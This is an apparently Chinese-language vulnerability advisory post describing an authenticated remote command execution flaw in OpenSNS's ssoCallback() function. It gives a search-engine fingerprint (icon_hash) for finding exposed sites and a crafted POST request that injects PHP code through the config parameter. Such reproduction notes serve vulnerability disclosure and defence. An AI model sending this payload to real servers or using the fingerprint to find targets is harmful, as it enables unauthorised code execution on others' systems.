OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
# OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
## 漏洞描述
OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取...
OpenSNS AuthorizeController.class.php 后台远程命令执行漏洞
漏洞描述
OpenSNS AuthorizeController.class.php文件 ssoCallback() 函数存在命令执行漏洞,在登录的情况下可以获取服务器权限
漏洞影响
OpenSNS
网络测绘
icon_hash="1167011145"
漏洞复现
登录页面如下
存在漏洞的文件为 Application/Admin/Controller/AuthorizeController.class.php
其中 config参数可控,构造请求就可以通过 file_put_contents 写入执行任意命令
构造请求包
POST /admin.php?s=/Authorize/ssoCallback\
config[SSO_CONFIG]=phpinfo();
- 发表于 2024-07-12 18:43:30
- 阅读 ( 2506 )
- 分类:CMS
带头大哥
456 篇文章